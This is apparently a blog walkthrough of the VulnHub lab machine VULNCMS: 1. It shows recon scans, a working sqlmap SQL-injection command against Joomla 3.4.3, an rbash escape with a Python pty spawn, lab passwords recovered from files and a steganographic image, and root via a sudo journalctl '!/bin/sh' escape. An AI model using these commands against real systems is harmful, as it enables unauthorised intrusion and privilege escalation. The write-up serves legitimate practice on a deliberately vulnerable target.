Vulnhub: VULNCMS: 1
VulnCMS
This is VULNCMS: 1 from VulnHub. We’ve got some new machines, so let’s go.
Ports
We’ve got SSH on 22; a website on 80. And then we’ve got Wordpress on 5000, Joomla on 8081 and Drupal on 9001. Where shall we start?
Wordpress?
nmap says:
_http-generator: WordPress 5.7.2
That’s a recent version; if there was a vulnerability in WP core I’d probably have heard about it. Of course it could be a plugin, but let’s pass for now.
Drupal
┌──(root💀kali)-[/opt/vulnhub/vulncms]
└─# droopescan scan drupal -u http://192.168.1.241:9001
[+] Plugins found:
profile http://192.168.1.241:9001/modules/profile/
php http://192.168.1.241:9001/modules/php/
image http://192.168.1.241:9001/modules/image/
[+] Themes found:
seven http://192.168.1.241:9001/themes/seven/
garland http://192.168.1.241:9001/themes/garland/
[+] Possible version(s):
7.54
[+] Possible interesting urls found:
Default changelog file - http://192.168.1.241:9001/CHANGELOG.txt
[+] Scan finished (0:00:07.905186 elapsed)A quick search doesn’t find anything obvious for version 7.54; let’s move on.
Joomla
┌──(root💀kali)-[/opt/vulnhub/vulncms]
└─# joomscan --url http://192.168.1.241:8081This turns up:
[+] Detecting Joomla Version
[++] Joomla 3.4.3
Which is vulnerable to SQLi. There are some scripts; I run sqlmap with this command:
sqlmap -u "http://192.168.1.241:8081//index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=*" --technique=E --dbs --dump
The moon rises and falls. Seasons change. Little babies grow into adults. Eventually, the entire database is dumped. Ok yes this was my fault for not optimising the query - but it’s my time I wasted.
We get some hashes (can’t break), and this:
47,elliot,
,1,5T3e!_M0un7i@N, , AND OTHER STUFF
With this, which was in users, we can SSH in as Elliot.
Elliot
Elliot has rbash; don’t be like Elliot:
Last login: Thu Jun 17 11:49:58 2021 from 192.168.1.210
elliot@vuln_cms:~$ cd /
-rbash: cd: restricted
elliot@vuln_cms:~$ python3 -c 'import pty;pty.spawn("/bin/bash");'
elliot@vuln_cms:~$ cd /dev/shm
elliot@vuln_cms:/dev/shm$Elliot can’t run sudo. I run linpeas but get nothing very useful. I find this:
elliot@vuln_cms:/$ cd opt
elliot@vuln_cms:/opt$ ls -lash
total 12K
4.0K drwxr-xr-x 2 root root 4.0K May 31 07:59 .
4.0K drwxr-xr-x 24 root root 4.0K Jun 17 11:20 ..
4.0K -rw-r--r-- 1 root root 69 May 31 07:58 8081.cred
elliot@vuln_cms:/opt$ cat 8081.cred
Username: joomlaCMS_admin
Password: _q4gWWJuBWt8cqfbUm-cdevR?L@N7-pRNot useful. I find this:
elliot@vuln_cms:/var/www/html/home/vulnerable$ ls -lash
total 2.0M
4.0K drwxr-xr-x 2 tyrell tyrell 4.0K May 31 07:45 .
4.0K drwxr-xr-x 3 tyrell tyrell 4.0K May 30 09:34 ..
1.3M -rw-r--r-- 1 tyrell tyrell 1.3M May 26 06:54 image1.png
16K -rw-r--r-- 1 tyrell tyrell 15K May 26 06:55 image2.jpg
156K -rw-r--r-- 1 tyrell tyrell 153K May 26 06:55 image3.jpg
96K -rw-r--r-- 1 tyrell tyrell 94K May 31 07:44 image4.jpg
352K -rw-r--r-- 1 tyrell tyrell 352K May 26 07:07 image5.jpg
24K -rw-r--r-- 1 tyrell tyrell 22K May 26 07:08 image6.gif
elliot@vuln_cms:Notice the date on image4 is different?
┌──(root💀kali)-[/opt/vulnhub/vulncms]
└─# stegseek image4.jpg
StegSeek version 0.5
Progress: 0.00% (0 bytes)
[i] --> Found passphrase: "123456789"
[i] Original filename: "wp_pass.txt"
[i] Extracting to "image4.jpg.out"
┌──(root💀kali)-[/opt/vulnhub/vulncms]
└─# cat image4.jpg.out
Random URLs are helpful but 5000 timesNot useful.
Then I find this:
elliot@vuln_cms:/var/www/html/drupal/misc$ ls -lash
total 504K
4.0K drwxr-xr-x 4 tyrell tyrell 4.0K May 31 10:47 .
4.0K drwxr-xr-x 9 tyrell tyrell 4.0K May 31 09:17 ..
# snip
4.0K -rwxr-xr-x 1 tyrell tyrell 129 Feb 1 2017 tree-bottom.png
4.0K -rwxr-xr-x 1 tyrell tyrell 130 Feb 1 2017 tree.png
4.0K -rw-r--r-- 1 root root 45 May 31 10:47 tyrell.pass
4.0K drwxr-xr-x 3 tyrell tyrell 4.0K Feb 1 2017 ui
# snip
elliot@vuln_cms:/var/www/html/drupal/misc$ cat tyrell.pass
Username: tyrell
Password: mR_R0bo7_i5_R3@!_
elliot@vuln_cms:/var/www/html/drupal/misc$ su tyrell
Password:
tyrell@vuln_cms:/var/www/html/drupal/misc$ sudo -l
Matching Defaults entries for tyrell on vuln_cms:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tyrell may run the following commands on vuln_cms:
(root) NOPASSWD: /bin/journalctl
tyrell@vuln_cms:Definitely useful.
tyrell@vuln_cms:/var/www/html/drupal/misc$ sudo -u root /bin/journalctl
-- Logs begin at Fri 2021-05-28 12:16:41 UTC, end at Fri 2021-06-18 10:55:53 UTC
May 28 12:16:41 vuln_cms kernel: Linux version 4.15.0-143-generic (buildd@lcy01-
May 28 12:16:41 vuln_cms kernel: Command line: BOOT_IMAGE=/vmlinuz-4.15.0-143-ge
# snip
May 28 12:16:41 vuln_cms kernel: NX (Execute Disable) protection: active
!/bin/sh
# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
vuln_cms
Fri Jun 18 10:56:11 UTC 2021
# cd /root
# ls
root.txt
# cat root.txt
4359537020406305And done.